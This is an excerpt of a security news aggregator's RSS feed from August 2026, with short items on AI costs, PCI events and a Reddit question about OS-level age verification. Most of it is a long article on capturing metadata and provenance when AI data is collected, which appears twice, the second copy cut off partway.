			Weil die Kosten für den Ausbau der Infrastruktur hinter Diensten aus dem Bereich der sogenannten Künstlichen Intelligenz weiter steigen, ruft Microsofts Management die Entwickler des Konzerns auf, bei der <a href="https://winfuture.de/special/kuenstliche-intelligenz/" title="Künstliche Intelligenz Special">KI-Nutzung</a> sparsam vorzugehen.			(<a href="https://winfuture.de/news,160428.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[Interview: Cyberangriffe treffen das Kerngeschäft - E3-Magazin]]></title>
<description><![CDATA[Josko Jeraj, Manage Now: Cybersecurity ist längst mehr als IT-Thema – sie ist ein zentraler Aspekt des Geschäftsrisikos. Angriffe sind organisiert, ...]]></description>
<link>https://tsecurity.de/de/3706118/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706118/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 16:19:12 +0200</pubDate>
<content:encoded><![CDATA[Josko Jeraj, Manage Now: Cybersecurity ist längst mehr als <b>IT</b>-Thema – sie ist ein zentraler Aspekt des Geschäftsrisikos. Angriffe sind organisiert, ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Are we vibe coding our way to a new legacy crisis?]]></title>
<description><![CDATA[The AI that promised to free enterprises from technical debt may be more of it.]]></description>
<link>https://tsecurity.de/de/3706108/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706108/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 16:18:51 +0200</pubDate>
<content:encoded><![CDATA[The AI that promised to free enterprises from technical debt may be more of it.]]></content:encoded>
</item>
<item>
<title><![CDATA[Leadership Starts When You Stop Coding]]></title>
<description><![CDATA[YouTube Video]]></description>
<link>https://tsecurity.de/de/3706039/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3706039/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 16:06:53 +0200</pubDate>
<content:encoded><![CDATA[<p>YouTube Video</p><p><iframe loading="lazy" src="https://www.youtube.com/embed/InZtQeiYrvo"></iframe></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Join Us at the Payment Industry Events of the Year]]></title>
<description><![CDATA[Registration is now open for the PCI Security Standards Council's 2026 Community Meetings! Join payments industry professionals from around the world for inspiring keynotes, valuable networking opportunities, expert-led sessions, hands-on workshops, an expansive vendor showcase, and a special cel...]]></description>
<link>https://tsecurity.de/de/3705935/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705935/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 15:12:48 +0200</pubDate>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://blog.pcisecuritystandards.org/join-us-at-the-payment-industry-events-of-the-year-2026" title="" class="hs-featured-image-link"> <img src="https://blog.pcisecuritystandards.org/hubfs/2026-blog/join-us-at-a-cm-blog-new.jpg" alt="Join Us at the Payment Industry Events of the Year" class="hs-featured-image"> </a> 
</div> 
<br> 
<p>Registration is now open for the PCI Security Standards Council's <span><a href="https://events.pcisecuritystandards.org/">2026 Community Meetings</a></span>! Join payments industry professionals from around the world for inspiring keynotes, valuable networking opportunities, expert-led sessions, hands-on workshops, an expansive vendor showcase, and a special celebration marking <span><a href="https://www.pcisecuritystandards.org/pcisscturns20/">20 years</a></span> of PCI SSC.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OS Level age verification]]></title>
<description><![CDATA[So here recently I heard that Illinois would be rolling out OS level age verification and website age verification by 2028. That sucks, but if we think about this, would this really affect us? For example, Linux is not a OS. It is a Kernel. So is there a chance you could use that as a loophole? I...]]></description>
<link>https://tsecurity.de/de/3705787/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705787/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 14:17:45 +0200</pubDate>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>So here recently I heard that Illinois would be rolling out OS level age verification and website age verification by 2028. That sucks, but if we think about this, would this really affect us? For example, Linux is not a OS. It is a Kernel. So is there a chance you could use that as a loophole?</p> <p>If not then I wanna ask about another thing. I was recently on Wikipedia downloading a bunch of Linux distros that I wanted to try from a Live USB since I am still fairly new to Linux and have only downloaded one distro and haven't experimented with others. While I was scrolling I came across a Article on Wiki called "Ageless Linux". That caught my interest and I visited the website. What I want to know is if something like that would really work? I looked through the website and it is not exactly an distro that you would boot onto a USB, but rather a script. I don't know anything about coding, so I can't verify how the script would really work or the authenticity of the script itself, so that is why I thought I would bring it to y'alls attention for others to see if it is a good script that would work or something that could possibly be malicious as well as looking at other options on how to avoid this.</p> <p>Article for Age Verification:<br> <a href="https://evanstonroundtable.com/2026/04/16/state-lawmakers-advance-bill-requiring-age-verification-on-all-online-devices-and-websites/">https://evanstonroundtable.com/2026/04/16/state-lawmakers-advance-bill-requiring-age-verification-on-all-online-devices-and-websites/</a></p> <p>Ageless Linux wiki page:</p> <p><a href="https://en.wikipedia.org/wiki/Ageless_Linux">https://en.wikipedia.org/wiki/Ageless_Linux</a></p> <p>Ageless Linux website:</p> <p><a href="https://agelesslinux.org/index.html">https://agelesslinux.org/index.html</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Oily_Oaf"> /u/Oily_Oaf </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1vg5o0t/os_level_age_verification/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1vg5o0t/os_level_age_verification/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Uppsala Security Becomes First Blockchain Intelligence Company to Join Cyber Threat Alliance]]></title>
<description><![CDATA[SIngapore, Singapore, 5th August 2026, CyberNewswire]]></description>
<link>https://tsecurity.de/de/3705782/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705782/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 14:11:38 +0200</pubDate>
<content:encoded><![CDATA[SIngapore, Singapore, 5th August 2026, CyberNewswire]]></content:encoded>
</item>
<item>
<title><![CDATA[Seven experts join AI Office of Ireland board]]></title>
<description><![CDATA[Members include distinguished AI researcher Alan Smeaton and Shutterstock AI director Alessandra Sala.
Read more: Seven experts join AI Office of Ireland board]]></description>
<link>https://tsecurity.de/de/3705635/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705635/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 13:48:11 +0200</pubDate>
<content:encoded><![CDATA[<p>Members include distinguished AI researcher Alan Smeaton and Shutterstock AI director Alessandra Sala.</p>
<p>Read more: <a rel="nofollow" href="https://www.siliconrepublic.com/business/seven-experts-join-ai-office-of-ireland-board">Seven experts join AI Office of Ireland board</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Never mind clean data. Annotate as you collect it.]]></title>
<description><![CDATA[Generative AI is notoriously eager to help, to the point that if it can’t find something matching what you ask for, it’ll create it. So the problem with relying on guardrails is that all too often, a model will be wrong, showing a high confidence score for an incorrect answer because it’s relying...]]></description>
<link>https://tsecurity.de/de/3705489/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705489/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 12:14:38 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Generative AI is notoriously eager to help, to the point that if it can’t find something matching what you ask for, it’ll create it. So the problem with relying on guardrails is that all too often, a model will be wrong, showing a high confidence score for an incorrect answer because it’s relying on stale or non-canonical data.</p>



<p class="wp-block-paragraph">Not only do you need to be able to track the lineage of data your model uses from source to token, something the <a href="https://digital-strategy.ec.europa.eu/en/faqs/guidelines-and-code-practice-transparent-ai-systems?ref=distributedthoughts.org">EU AI Act requires</a>, you also need to be able to take into account where the data came from, whether it’s <a href="https://www.hbs.edu/faculty/Pages/item.aspx?num=58832&amp;ref=distributedthoughts.org">out of date</a>, if it changed in a way that affects the result, or if it was never really relevant or authoritative in the first place.</p>



<p class="wp-block-paragraph">Gartner expects organizations will abandon 60% of AI projects because they don’t have the right <a href="https://www.gartner.com/en/newsroom/press-releases/2025-02-26-lack-of-ai-ready-data-puts-ai-projects-at-risk">metadata management, data quality, and data observability</a>. IBM’s acquisition of Confluent also highlights the importance of real-time data with lineage, governance, and policy for AI agents, and <a href="https://www.ibm.com/think/news/ai-tech-trends-predictions-2026?ref=distributedthoughts.org">one of IBM’s 2026 predictions</a> was the importance of smarter data.</p>



<p class="wp-block-paragraph">The usual approach is adding metadata and validation later in the data pipeline. That’s similar to the way the bronze, silver, and gold tiers of typical lakehouse architecture are supposed to represent how filtering, cleaning, and augmenting data improves structure and quality until it’s ready to use. That can mean an enormous amount of work since nearly three quarters of the CPU work in training a frontier model is data cleansing and validation.</p>



<p class="wp-block-paragraph">But that can also remove a lot of the context crucial for gen AI. Rather than <a href="https://www.cio.com/article/3611247/when-is-data-too-clean-to-be-useful-for-enterprise-ai.html">cleaning data and losing the original context</a>, it’s often more effective to keep as much information about the original state of the data, says David Aronchick, open-source platform Kubeflow founder, and CEO of distributed data pipeline vendor Expanso. “You can’t pursue exactly purely clean data; that’s just not possible,” he says. “As you pull data into your ML model, every line should have some mechanism saying where it came from. Otherwise, you’re never really going to know because you can’t mix them together and tease them apart later. You can search your raw content, your raw logs, but it’s just not going to be there.”</p>



<p class="wp-block-paragraph">IoT digital twin systems often tag data all the way back to the device capturing it so you can see whether a temperature spike is a critical failure, which you want to react to, or a routine calibration, which you don’t. But that information may well be relevant down the line when you want to use that data more broadly. So unless you capture at least some elements about the source of data before you move it, you’re not going to be able to easily reconstruct the context later, or at all sometimes.</p>



<p class="wp-block-paragraph">Ulrik Hansen, co-CEO of Encord, a platform for managing and annotating data, calls this in-stream labelling and cautions it’s not an alternative to cleansing data. “Dirty conflates two things: actual corruption you should fix, and context dependence, where a reading only looks anomalous because you threw away the frame that explained it,” he says. “Cleansing kills both. The point isn’t to stop cleaning, it’s to stop normalizing away context you can never recover.”</p>



<p class="wp-block-paragraph">Context can be cheap to capture at the source and nearly impossible to recover after, he adds. “The question isn’t whether to keep it,” he says, “it’s about curating what actually helps.”</p>



<h2 class="wp-block-heading">Raw but not rancid</h2>



<p class="wp-block-paragraph">Aronchick characterizes the state of most bronze tiers as toxic waste because raw data doesn’t get validated before ingestion, or have a metadata wrapper on each data point. “You’ve taken raw data and stripped it of context,” he says.</p>



<p class="wp-block-paragraph">Take a wind farm operator, for instance. When sensor data about the turbines is generated, it comes from a particular turbine at a particular position in a specific wind farm at a known location, running at a specific speed in specific weather conditions, at a particular time. “If you have other turbines also working in the field, the performance of your turbine will go down, but the field performance will go up,” says Aronchick. “The performance of your turbine going down isn’t a negative, but unless you have the context at the point of data collection, you’re going to make your life much harder later on, when someone asks about the efficiency.”</p>



<p class="wp-block-paragraph">Metadata needs to be much richer, and it needs to be added as early in your data pipeline as possible when you have the most detail available to make sense of the structure and complexity of the data, Aronchick adds. “You want to capture as much about the data you’re collecting as possible, where it doesn’t require insane activity to do so.”</p>



<p class="wp-block-paragraph">But not all the metadata you need will be generated with the data, he says. You almost certainly need to augment and annotate your data, and provide extra structure, especially for something like a point of sale system with very light metadata. “Data comes off these things in poor structure,” he says. “It’s not OpenLineage, it’s often a CSV or a text record, and you have to reconstruct them into a full structured log. So do smart things where you’re creating data. That might be compressing, sampling, converting, appending metadata to it, and enforcing schema and lineage all before you start moving anything.”</p>



<p class="wp-block-paragraph">That doesn’t have to mean bloating your data, Hansen points out. He suggests capturing what’s free and unrecoverable. “The system of origin is the label,” he says. “You don’t tag HR policy, you capture that it came from the HR system. Anything a model can derive later, you can skip.”</p>



<h2 class="wp-block-heading">Structure isn’t static</h2>



<p class="wp-block-paragraph">Routine changes to APIs, schemas, and how data is collected or stored happen in every organization, and need to be reflected in metadata that lives alongside the data or added as data is collected, not reconstructed later in a fragile process that depends on knowing about all those changes. Google’s research into these <a href="https://research.google/blog/data-cascades-in-machine-learning/">data cascades</a> shows how easily context gets lost and how badly it affects data quality.</p>



<p class="wp-block-paragraph">Shifting schema enforcement further left in your data pipeline so you deal with it as soon as possible allows you to make more effective downstream decisions. For a sensor recording temperature and humidity, you need to know the temperature scale it uses, readings, and how the timestamp is recorded. Checking that against the schema before ingesting the data lets you route it differently depending on whether it validates or triggers alerts about data quality.</p>



<p class="wp-block-paragraph">“Maybe I’ll delete it, or send it off to some place where a human being or other tooling can reconstruct it into something valuable,” says Aronchick. “But what it doesn’t do is allow the polluted or bad data into my pipeline. Saying whether or not something passed your schema makes your downstream systems much more reliable.”</p>



<h2 class="wp-block-heading">Sensing structure</h2>



<p class="wp-block-paragraph">Unstructured and semistructured data needs more augmentation. A PDF or Word document has an author and a creation date, but doesn’t necessarily include any context about the job title and department of the author, whether it’s up to date, only applies to a particular group of customers, or is based on accounting regulations that can change. If that information is available, it needs to travel with the document, not be left in a compliance spreadsheet.</p>



<p class="wp-block-paragraph">Data platforms like DataHub and SurrealDB both capture and create context. The latter can analyze a photo, for instance, using vision AI to understand what’s in the image. “From completely unstructured data, we get as much structure as possible,” says the company’s CEO Tobie Morgan Hitchcock.</p>



<p class="wp-block-paragraph">That’s paired with other data potentially useful for an AI agent down the line. “Understanding what happened around an event becomes a lot easier if you’re tracking the conversation, telemetry, tool and model usage, geospatial data, and the vector search and relationships,” he says. “You’re going to have a far better chance of getting an accurate understanding of that data, which started off completely unstructured, than if you weren’t capturing anything.”</p>



<p class="wp-block-paragraph">Metadata about document authors, which might come from the company directory, can show how much authority a document has. He describes that as building an understanding of what trust and provenance is over time by the weight and authority of who’s updating the information. After all, he says, company-generated information has more trust or can have traced provenance compared to conversational inputs from a user.</p>



<h2 class="wp-block-heading">Incentives for annotating</h2>



<p class="wp-block-paragraph">DataHub CTO Shirshanka Das saw how much of a mess data can be even with strong guidelines as former architect of LinkedIn’s GDPR strategy. “The data was a swamp, despite us having had pretty good data-first and schema-first practices,” he says. As well as cleaning up the data governance, they added in the first nuggets of the DevOps’ ‘shift left’ approach.</p>



<p class="wp-block-paragraph">LinkedIn already required data checked in to its Kafka ecosystem to have a schema, and ran CI/CD pipelines to check backward compatibility. “I attached metadata attribution and collection around compliance metadata into that pipeline, where developers weren’t able to check in a schema until they had declared what every column meant.”</p>



<p class="wp-block-paragraph">The extra work was unpopular until teams who didn’t participate saw the flood of tickets that came their way, which allowed him to extend that same proactive governance and annotation at source approach to pretty much every data set being produced.</p>



<p class="wp-block-paragraph">“The starting point of data at most companies is a lot more swampy,” he says. “Many people are using Kafka, which is a very schema forward system, and yet they’re just shoving in JSON and unstructured stuff.”</p>



<p class="wp-block-paragraph">That’s common, agrees Megha Kumar, research VP for analytics and AI at IDC, because while collecting more metadata provides better context and cleaner data lineage, it’s hard in practice. “Most organizations batch process data, so real-time context capture rarely happens,” she says. “Even the ones that process in real-time tend to have pre-defined schemas, so adding context requires changes to the data, which unfortunately happens later.”</p>



<p class="wp-block-paragraph">People don’t know how to start, says Das, so DataHub Cloud tries to add back context by collecting operational metadata from multiple systems, including queries and BI tools to extrapolate a semantic model. “We confront the mess by giving them something they can react to,” he says. “They can quickly validate, and then it starts becoming a governance layer on top where humans annotate at source.”</p>



<p class="wp-block-paragraph">Online whiteboard provider Miro, for example, dramatically improved AI agent query accuracy from about 50% to 90% using DataHub. Then they applied GitOps principles on top of what was inferred with a human in the loop for approvals.</p>



<p class="wp-block-paragraph">So getting people to do the work happened the same way at LinkedIn, says Das. “When a data scientist gets 10 times more requests because they didn’t document their work well, resulting in the AI making lots of mistakes and stakeholders constantly pinging them for answers, they have the incentive to add the annotation when they produce an analysis, because then they get out of the critical path.”</p>



<h2 class="wp-block-heading">DBOMs and data contracts</h2>



<p class="wp-block-paragraph">Provenance and lineage of data is critical, Aronchick says, so you can preserve details like who collected the data, when, from where, if the source was authoritative or canonical, what transformations were run, and exactly what the model saw.</p>



<p class="wp-block-paragraph">“It’s not just about the version and the metadata,” he says. “Where things really start to change is when you can say along the way this data has gone through these steps, this is the root source, and these were the other elements.” You want to be able to find out if there were any experimental flags, like a new customer campaign running when it was collected, as well as what claims the data contributes to.</p>



<p class="wp-block-paragraph">Aronchick advocates for a SLSA-style data bill of materials using a tool like <a href="https://usemakoto.dev/">Makoto</a>, which can add signed provenance and attestation to simplify applying central concepts of governance and structure to upstream data.</p>



<p class="wp-block-paragraph">The notion of a data contract or a data product spec is starting to become common in the financial sector says Das, defining it as a data set, or a group of data sets, bound together by a contract that defines expectations which aren’t just cosmetic but machine verifiable. They can also include operational SLOs for APIs as contracts describe not just the shape of the data but operational characteristics and guarantees.</p>



<p class="wp-block-paragraph">Document graph markup language (DGML), a new open source specification from Docugami, promises provenance down to individual data points automatically extracted from documents.</p>



<p class="wp-block-paragraph">“It’s critical to know the validity and provenance of the information your AI is relying on,” Docugami CEO and XML co-creator Jean Paoli says. “Establishing the validity of data right from the start, at scale, is vital and far more efficient than trying to clean up bad data later.” DGML combines semantic tags describing what content means in its business context with bounding boxes showing exactly where in the document the content comes from, with attestation to prove it.</p>



<h2 class="wp-block-heading">AI demands provenance</h2>



<p class="wp-block-paragraph">All this context is the kind of metadata <a href="https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents?ref=distributedthoughts.org">Anthropic’s context engineering guide</a> recommends feeding to agents for accuracy. Developers are already used to giving coding agents more context, Das argues. “The same thing is happening with data, as when people realize when AI agents can’t make sense of what they’re doing, hallucinations happen,” he says.</p>



<p class="wp-block-paragraph">Kumar agrees that organizations realize agents need context to provide better insights. “In many cases, it has to do with ensuring the existing data had clear semantics and relationships,” she says.</p>



<p class="wp-block-paragraph">If you want to make sure the purchase return window an AI chatbot promises customers is based on your own policy, not a wish list from a user forum, you need rich context. It’s not just metadata. Organizations need to have semantics, data lineage, and ontologies. “Many are also building knowledge and ontology graphs,” adds Kumar. “By ensuring the systems understand what the data means, it’ll be able to provide a better response.”</p>



<p class="wp-block-paragraph">And if you’re going to the expense of fine tuning, which needs relevant and domain- or task-specific examples, you don’t want noise, duplication, or irrelevant content in your data. You can, of course, exclude poor data if it’s annotated and verified earlier, but you can also improve model performance with extra information, Aronchick points out. “The augmentation of the existing data makes the data you pull out more valuable,” he says.</p>



<p class="wp-block-paragraph">Expanso recently <a href="https://expanso.io/news/edge-ai-startup-of-the-year-2026/">won an Edge AI award</a> for fine tuning a base level model with only about 3,200 images by augmenting them with metadata. “The reason it worked on that few is because I could tell it deterministically what was in the frame,” he adds. “It’s labeling at the point of capture instead of paying somebody to label it later. What if I developed models for predictive analytics of store behavior on a per city, region, or country basis? If I’m able to take the raw point of sale information and augment it with additional metadata, I’m turning this into a much easier thing to fine tune.”</p>



<p class="wp-block-paragraph">Or you might even avoid the expense of fine tuning entirely, suggests Das. “You get the short-term advantage by fine-tuning and getting great performance at much cheaper cost on a smaller model, and it gets stripped away in a couple of months as a new model shows up,” he says. “You have to always run that calculus of when’s the right threshold to fine tune an existing model, distil it, and then run it for a fair amount of time to recoup the costs of fine tuning.”</p>



<p class="wp-block-paragraph">Although regulated or slow-moving industries will see benefits from fine tuning a model they can run for six to 12 months on data with higher quality and better provenance, many organizations may use the improved data quality to get good results without fine tuning.</p>



<p class="wp-block-paragraph">“We’re taking a more knowledge graph-oriented approach to grounding the model, and betting on the fact that because the knowledge graph is changing often, it’s better to keep it as a runtime artifact than a baked-in one.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Never mind clean data. Annotate as you collect it.]]></title>
<description><![CDATA[Generative AI is notoriously eager to help, to the point that if it can’t find something matching what you ask for, it’ll create it. So the problem with relying on guardrails is that all too often, a model will be wrong, showing a high confidence score for an incorrect answer because it’s relying...]]></description>
<link>https://tsecurity.de/de/3705480/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705480/nachrichtenportal/</guid>
<pubDate>Wed, 05 Aug 2026 12:08:20 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Generative AI is notoriously eager to help, to the point that if it can’t find something matching what you ask for, it’ll create it. So the problem with relying on guardrails is that all too often, a model will be wrong, showing a high confidence score for an incorrect answer because it’s relying on stale or non-canonical data.</p>



<p class="wp-block-paragraph">Not only do you need to be able to track the lineage of data your model uses from source to token, something the <a href="https://digital-strategy.ec.europa.eu/en/faqs/guidelines-and-code-practice-transparent-ai-systems?ref=distributedthoughts.org">EU AI Act requires</a>, you also need to be able to take into account where the data came from, whether it’s <a href="https://www.hbs.edu/faculty/Pages/item.aspx?num=58832&amp;ref=distributedthoughts.org">out of date</a>, if it changed in a way that affects the result, or if it was never really relevant or authoritative in the first place.</p>



<p class="wp-block-paragraph">Gartner expects organizations will abandon 60% of AI projects because they don’t have the right <a href="https://www.gartner.com/en/newsroom/press-releases/2025-02-26-lack-of-ai-ready-data-puts-ai-projects-at-risk">metadata management, data quality, and data observability</a>. IBM’s acquisition of Confluent also highlights the importance of real-time data with lineage, governance, and policy for AI agents, and <a href="https://www.ibm.com/think/news/ai-tech-trends-predictions-2026?ref=distributedthoughts.org">one of IBM’s 2026 predictions</a> was the importance of smarter data.</p>



<p class="wp-block-paragraph">The usual approach is adding metadata and validation later in the data pipeline. That’s similar to the way the bronze, silver, and gold tiers of typical lakehouse architecture are supposed to represent how filtering, cleaning, and augmenting data improves structure and quality until it’s ready to use. That can mean an enormous amount of work since nearly three quarters of the CPU work in training a frontier model is data cleansing and validation.</p>



<p class="wp-block-paragraph">But that can also remove a lot of the context crucial for gen AI. Rather than <a href="https://www.cio.com/article/3611247/when-is-data-too-clean-to-be-useful-for-enterprise-ai.html">cleaning data and losing the original context</a>, it’s often more effective to keep as much information about the original state of the data, says David Aronchick, open-source platform Kubeflow founder, and CEO of distributed data pipeline vendor Expanso. “You can’t pursue exactly purely clean data; that’s just not possible,” he says. “As you pull data into your ML model, every line should have some mechanism saying where it came from. Otherwise, you’re never really going to know because you can’t mix them together and tease them apart later. You can search your raw content, your raw logs, but it’s just not going to be there.”</p>



<p class="wp-block-paragraph">IoT digital twin systems often tag data all the way back to the device capturing it so you can see whether a temperature spike is a critical failure, which you want to react to, or a routine calibration, which you don’t. But that information may well be relevant down the line when you want to use that data more broadly. So unless you capture at least some elements about the source of data before you move it, you’re not going to be able to easily reconstruct the context later, or at all sometimes.</p>



<p class="wp-block-paragraph">Ulrik Hansen, co-CEO of Encord, a platform for managing and annotating data, calls this in-stream labelling and cautions it’s not an alternative to cleansing data. “Dirty conflates two things: actual corruption you should fix, and context dependence, where a reading only looks anomalous because you threw away the frame that explained it,” he says. “Cleansing kills both. The point isn’t to stop cleaning, it’s to stop normalizing away context you can never recover.”</p>



<p class="wp-block-paragraph">Context can be cheap to capture at the source and nearly impossible to recover after, he adds. “The question isn’t whether to keep it,” he says, “it’s about curating what actually helps.”</p>



<h2 class="wp-block-heading">Raw but not rancid</h2>



<p class="wp-block-paragraph">Aronchick characterizes the state of most bronze tiers as toxic waste because raw data doesn’t get validated before ingestion, or have a metadata wrapper on each data point. “You’ve taken raw data and stripped it of context,” he says.</p>



<p class="wp-block-paragraph">Take a wind farm operator, for instance. When sensor data about the turbines is generated, it comes from a particular turbine at a particular position in a specific wind farm at a known location, running at a specific speed in specific weather conditions, at a particular time. “If you have other turbines also working in the field, the performance of your turbine will go down, but the field performance will go up,” says Aronchick. “The performance of your turbine going down isn’t a negative, but unless you have the context at the point of data collection, you’re going to make your life much harder later on, when someone asks about the efficiency.”</p>



<p class="wp-block-paragraph">Metadata needs to be much richer, and it needs to be added as early in your data pipeline as possible when you have the most detail available to make sense of the structure and complexity of the data, Aronchick adds. “You want to capture as much about the data you’re collecting as possible, where it doesn’t require insane activity to do so.”</p>



<p class="wp-block-paragraph">But not all the metadata you need will be generated with the data, he says. You almost certainly need to augment and annotate your data, and provide extra structure, especially for something like a point of sale system with very light metadata. “Data comes off these things in poor structure,” he says. “It’s not OpenLineage, it’s often a CSV or a text record, and you have to reconstruct them into a full structured log. So do smart things where you’re creating data. That might be compressing, sampling, converting, appending metadata to it, and enforcing schema and lineage all before you start moving anything.”</p>



<p class="wp-block-paragraph">That doesn’t have to mean bloating your data, Hansen points out. He suggests capturing what’s free and unrecoverable. “The system of origin is the label,” he says. “You don’t tag HR policy, you capture that it came from the HR system. Anything a model can derive later, you can skip.”</p>



<h2 class="wp-block-heading">Structure isn’t static</h2>



<p class="wp-block-paragraph">Routine changes to APIs, schemas, and how data is collected or stored happen in every organization, and need to be reflected in metadata that lives alongside the data or added as data is collected, not reconstructed later in a fragile process that depends on knowing about all those changes. Google’s research into these <a href="https://research.google/blog/data-cascades-in-machine-learning/">data cascades</a> shows how easily context gets lost and how badly it affects data quality.</p>



<p class="wp-block-paragraph">Shifting schema enforcement further left in your data pipeline so you deal with it as soon as possible allows you to make more effective downstream decisions. For a sensor recording temperature and humidity, you need to know the temperature scale it uses, readings, and how the timestamp is recorded. Checking that against the schema before ingesting the data lets you route it differently depending on whether it validates or triggers alerts about data quality.</p>



<p class="wp-block-paragraph">“Maybe I’ll delete it, or send it off to some place where a human being or other tooling can reconstruct it into something valuable,” says Aronchick. “But what it doesn’t do is allow the polluted or bad data into my pipeline. Saying whether or not something passed your schema makes your downstream systems much more reliable.”</p>



<h2 class="wp-block-heading">Sensing structure</h2>



<p class="wp-block-paragraph">Unstructured and semistructured data needs more augmentation. A PDF or Word document has an author and a creation date, but doesn’t necessarily include any context about the job title and department of the author, whether it’s up to date, only applies to a particular group of customers, or is based on accounting regulations that can change. If that information is available, it needs to travel with the document, not be left in a compliance spreadsheet.</p>



<p class="wp-block-paragraph">Data platforms like DataHub and SurrealDB both capture and create context. The latter can analyze a photo, for instance, using vision AI to understand what’s in the image. “From completely unstructured data, we get as much structure as possible,” says the company’s CEO Tobie Morgan Hitchcock.</p>



<p class="wp-block-paragraph">That’s paired with other data potentially useful for an AI agent down the line. “Understanding what happened around an event becomes a lot easier if you’re tracking the conversation, telemetry, tool and model usage, geospatial data, and the vector search and relationships,” he says. “You’re going to have a far better chance of getting an accurate understanding of that data, which started off completely unstructured, than if you weren’t capturing anything.”</p>



<p class="wp-block-paragraph">Metadata about document authors, which might come from the company directory, can show how much authority a document has. He describes that as building an understanding of what trust and provenance is over time by the weight and authority of who’s updating the information. After all, he says, company-generated information has more trust or can have traced provenance compared to conversational inputs from a user.</p>



<h2 class="wp-block-heading">Incentives for annotating</h2>



<p class="wp-block-paragraph">DataHub CTO Shirshanka Das saw how much of a mess data can be even with strong guidelines as former architect of LinkedIn’s GDPR strategy. “The data was a swamp, despite us having had pretty good data-first and schema-first practices,” he says. As well as cleaning up the data governance, they added in the first nuggets of the DevOps’ ‘shift left’ approach.</p>



<p class="wp-block-paragraph">LinkedIn already required data checked in to its Kafka ecosystem to have a schema, and ran CI/CD pipelines to check backward compatibility. “I attached metadata attribution and collection around compliance metadata into that pipeline, where developers weren’t able to check in a schema until they had declared what every column meant.”</p>



<p class="wp-block-paragraph">The extra work was unpopular until teams who didn’t participate saw the flood of tickets that came their way, which allowed him to extend that same proactive governance and annotation at source approach to pretty much every data set being produced.</p>



<p class="wp-block-paragraph">“The starting point of data at most companies is a lot more swampy,” he says. “Many people are using Kafka, which is a very schema forward system, and yet they’re just shoving in JSON and unstructured stuff.”</p>



<p class="wp-block-paragraph">That’s common, agrees Megha Kumar, research VP for analytics and AI at IDC, because while collecting more metadata provides better context and cleaner data lineage, it’s hard in practice. “Most organizations batch process data, so real-time context capture rarely happens,” she says. “Even the ones that process in real-time tend to have pre-defined schemas, so adding context requires changes to the data, which unfortunately happens later.”</p>



<p class="wp-block-paragraph">People don’t know how to start, says Das, so DataHub Cloud tries to add back context by collecting operational metadata from multiple systems, including queries and BI tools to extrapolate a semantic model. “We confront the mess by giving them something they can react to,” he says. “They can quickly validate, and then it starts becoming a governance layer on top where humans annotate at source.”</p>



<p class="wp-block-paragraph">Online whiteboard provider Miro, for example, dramatically improved AI agent query accuracy from about 50% to 90% using DataHub. Then they applied GitOps principles on top of what was inferred with a human in the loop for approvals.</p>



<p class="wp-block-paragraph">So getting people to do the work happened the same way at LinkedIn, says Das. “When a data scientist gets 10 times more requests because they didn’t document their work well, resulting in the AI making lots of mistakes and stakeholders constantly pinging them for answers, they have the incentive to add the annotation when they produce an analysis, because then they get out of the critical path.”</p>



<h2 class="wp-block-heading">DBOMs and data contracts</h2>



<p class="wp-block-paragraph">Provenance and lineage of data is critical, Aronchick says, so you can preserve details like who collected the data, when, from where, if the source was authoritative or canonical, what transformations were run, and exactly what the model saw.</p>



<p class="wp-block-paragraph">“It’s not just about the version and the metadata,” he says. “Where things really start to change is when you can say along the way this data has gone through these steps, this is the root source, and these were the other elements.” You want to be able to find out if there were any experimental flags, like a new customer campaign running when it was collected, as well as what claims the data contributes to.</p>



<p class="wp-block-paragraph">Aronchick advocates for a SLSA-style data bill of materials using a tool like <a href="https://usemakoto.dev/">Makoto</a>, which can add signed provenance and attestation to simplify applying central concepts of governance and structure to upstream data.</p>



<p class="wp-block-paragraph">The notion of a data contract or a data product spec is starting to become common in the financial sector says Das, defining it as a data set, or a group of data sets, bound together by a contract that defines expectations which aren’t just cosmetic but machine verifiable. They can also include operational SLOs for APIs as contracts describe not just the shape of the data but operational characteristics and guarantees.</p>



